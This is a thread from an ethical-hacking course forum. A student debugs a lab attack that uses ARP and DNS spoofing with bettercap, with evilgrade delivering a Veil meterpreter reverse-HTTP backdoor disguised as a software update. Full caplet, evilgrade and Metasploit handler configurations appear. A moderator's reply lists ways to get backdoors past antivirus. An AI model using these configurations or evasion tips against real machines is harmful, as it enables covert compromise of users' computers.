Viewing 15 posts - 1 through 15 (of 16 total)
  • Author
    Posts
  • #42939
    AvatarTerrensu
    Participant

    Hey,

    Sorry to bother you, however when i was working on the content displayed in lecture 16.8, everything was fine until the last part, where Mr zaid downloads the installer from DAP, i tried to do that on my windows machine, got a message of ‘400 bad connection’ when i tried to access the website, however other websites did work. I tried to install the dap installer on another website, which worked however when i opened it, no meterpreter session was created. How can i fix this?

    thanks.

    #42940
    AvatarTerrensu
    Participant

    Also, i when i try to access other websites an error of HTTPerror(‘invalid http request form’ expected absolute, got relative) would occur

    #42941
    AvatarTerrensu
    Participant

    Similar problem also occured in 16.7 everything worked fine until i clicked ‘update now’ in DAP client, where it would display an error of ‘Discovered an error in the component list’ and stopped me going any further. Please help

    #43043
    diegodiego
    Moderator

    Hi!
    Did your backdoor work if you run it by it’s own?
    ​Can you show me the following please:
    1. Result of ​ifconfig ​in Kali.
    2. The result of ipconfig in Windows.
    3. The configuration for evilgrade.
    4. T​he result of ​show options ​before running the multi handler.​
    5. Bettercap’s version and command used to start it.
    6. The contents of arp spoof caplet.
    7. The result of: get dns.spoof.*

    Let me know.
    Diego

    #43050
    AvatarTerrensu
    Participant

    Hey diego:

    Thanks for replying below is the information youre seeking for!
    IFCONFIG

    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
    inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
    inet6 fe80::a00:27ff:fe59:fbfa prefixlen 64 scopeid 0x20<link>
    ether 08:00:27:59:fb:fa txqueuelen 1000 (Ethernet)
    RX packets 6 bytes 900 (900.0 B)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 27 bytes 2314 (2.2 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
    inet 127.0.0.1 netmask 255.0.0.0
    inet6 ::1 prefixlen 128 scopeid 0x10<host>
    loop txqueuelen 1000 (Local Loopback)
    RX packets 24 bytes 1356 (1.3 KiB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 24 bytes 1356 (1.3 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
    Configuration for evilgrade:
    Payload: go/meterpreter/rev_http selected

    Required Options:

    Name Value Description
    —- —– ———–
    BADMACS FALSE Check for VM based MAC addresses
    CLICKTRACK X Require X number of clicks before execution
    COMPILE_TO_EXE Y Compile to an executable
    CURSORCHECK FALSE Check for mouse movements
    DISKSIZE X Check for a minimum number of gigs for hard disk
    HOSTNAME X Optional: Required system hostname
    INJECT_METHOD Virtual Virtual or Heap
    LHOST 10.0.2.15 IP of the Metasploit handler
    LPORT 8080 Port of the Metasploit handler
    MINPROCS X Minimum number of running processes
    PROCCHECK FALSE Check for active VM processes
    PROCESSORS 1 Optional: Minimum number of processors
    RAMCHECK FALSE Check for at least 3 gigs of RAM
    SLEEP 5 Optional: Sleep “Y” seconds, check if accelerated
    USERNAME X Optional: The required user account
    USERPROMPT FALSE Prompt user prior to injection
    UTCCHECK FALSE Check if system uses UTC time

    The result of show options in msfconsole:
    Module options (exploit/multi/handler):

    Name Current Setting Required Description
    —- ————— ——– ———–

    Payload options (windows/meterpreter/reverse_http):

    Name Current Setting Required Description
    —- ————— ——– ———–
    EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
    LHOST 10.0.2.15 yes The local listener hostname
    LPORT 8080 yes The local listener port
    LURI no The HTTP Path

    Exploit target:

    Id Name
    — —-
    0 Wildcard Target
    bettercap’s version and command used to start it:
    [email protected]:~# bettercap -iface eth0 -caplet /root/spoof.cap
    bettercap v2.23 (built for linux amd64 with go1.11.6) [type ‘help’ for a list of commands]

    [00:26:15] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
    [00:26:15] [endpoint.new] endpoint 10.0.2.3 detected as 08:00:27:b5:47:34 (PCS Computer Systems GmbH).
    [00:26:15] [sys.log] [inf] arp.spoof enabling forwarding
    [00:26:15] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
    [00:26:15] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.

    The contents of the arp spoof caplet.
    net.probe on
    set arp.spoof.fullduplex true
    set arp.spoof.targets 10.0.2.7
    arp.spoof on
    set net.sniff.local true
    net.sniff on

    Im a bit confused on how to get dns.spoof?

    #43051
    AvatarTerrensu
    Participant

    The ip address of the windows machine is 10.0.2.7 and the mac address of the router (10.0.2.1) did change after i ran the bettercap command, the mac address turned to the same address as the linux machine

    #43052
    AvatarTerrensu
    Participant

    and here is the evilgrade configuration:
    Name = Download Accelerator
    Version = 1.0
    Author = [“Francisco Amato < famato +[AT]+ infobytesec.com>”]
    Description = “”
    VirtualHost = “(update.speedbit.com)”

    .———————————————————————————————————-.
    | Name | Default | Description |
    +————-+————————————————-+——————————————+
    | title | Critical update | Title name display in the update |
    | failsite | http://www.speedbit.com/finishupdate.asp?noupdate=&R=0 | Website display when did’t finish update |
    | enable | 1 | Status |
    | agent | /var/lib/veil/output/compiled/Pay.exe | Agent to inject |
    | endsite | speedbit.com | Website display when finish update |
    | description | This critical update fix internal vulnerability | Description display in the update |
    ‘————-+————————————————-+——————————————‘

    #43053
    AvatarTerrensu
    Participant

    after running everything again, the dap software on my windows pc was able to detect the update, however when i ran it, no session was created in msfconsole.

    #43054
    AvatarTerrensu
    Participant

    HTTPSError(‘Invalid HTTPS request form ( expected: absolute, got: relatvie);

    was the error shown when i tried to acces speedbit.com like Mr Zaid did in lecture 16.8, everything went back to normal once i closed the services in the kali machine

    #43108
    diegodiego
    Moderator

    Hi!
    Did the backdoor work if you run it by it’s own?

    Can you share the result of get dns.spoof.* ?

    Let me know.
    Diego

    #43119
    AvatarTerrensu
    Participant

    Hey,

    How do I deliver the back-door to my windows machine and what how do I get the result of dns.spoof is it just the lines of code after I run bettercap?

    Sorry to bother you.

    #43134
    AvatarTerrensu
    Participant

    Hey diego,

    i was able to send my backdoor to my windows machine and a meterpreter session was created on my linux machine, although I found out that windows didnt allow me to download the backdoor, so I had to manually switch off windows defender, which in obvious cases, isn’t gonna happen in a real life scenario, any suggestions on how i can fix it? Furthermore, im still a bit confused on how to get the results of dns spoof?

    Sorry for bothering.

    #43176
    diegodiego
    Moderator

    Hi!
    For the results of dns.spoof module just run the command in bettercap terminal when tou have done all your settings:

    get dns.spoof.*

    Also keep defender disabled. To bypass it:
    Basically bypassing AV programs is like a game of cat and mouse, so backdoors might start getting detected at some stage, then the developers release an update, this will allow you to generate undetectable backdoors, then AV programs release an update which will make backdoors detectable ……..
    So the main thing is to make sure that Veil or any other tool you’re using to generate the backdoor is up to date.​​
    Here’s a few solutions to try if your backdoor is getting detected:
    1. Make sure that you have the latest version of Veil, so do ​updated ​before doing ​use 1.
    ​2. Experiment with different payloads, and experiment with different payload options and you should be able to bypass it.​
    3. Try generating a backdoor using the fat rat, empire (tutorial link for empire in the resources of lecture 68).
    4. Modify backdoor code if its in bat (covered in my social engineering course.
    5. Modify backdoor using a hex editor (covered in my social engineering course).
    6. Create your own backdoor (covered in my python course).
    The best thing to do is look at the last lecture of the course (bonus lecture) it contains all the courses that you can take with this course and a comparison between them.

    Also check out this video:

    How To Create Fully Undetectable Backdoors

    Hope it helps!
    Diego

    #43240
    AvatarTerrensu
    Participant

    Hey diego,

    When i enter the command get dns.spoof in kali, it returns with an error saying sys.log [err] dns.spoof not found, how can i fix this?

    thanks

    #43241
    AvatarTerrensu
    Participant

    Hey diego,

    Is it this thing?
    dns.spoof.address: ‘<interface address>’
    dns.spoof.all: ‘true’
    dns.spoof.domains: ‘update.speedbit.com’
    dns.spoof.hosts: ”

    regards,

Viewing 15 posts - 1 through 15 (of 16 total)
  • You must be logged in to reply to this topic.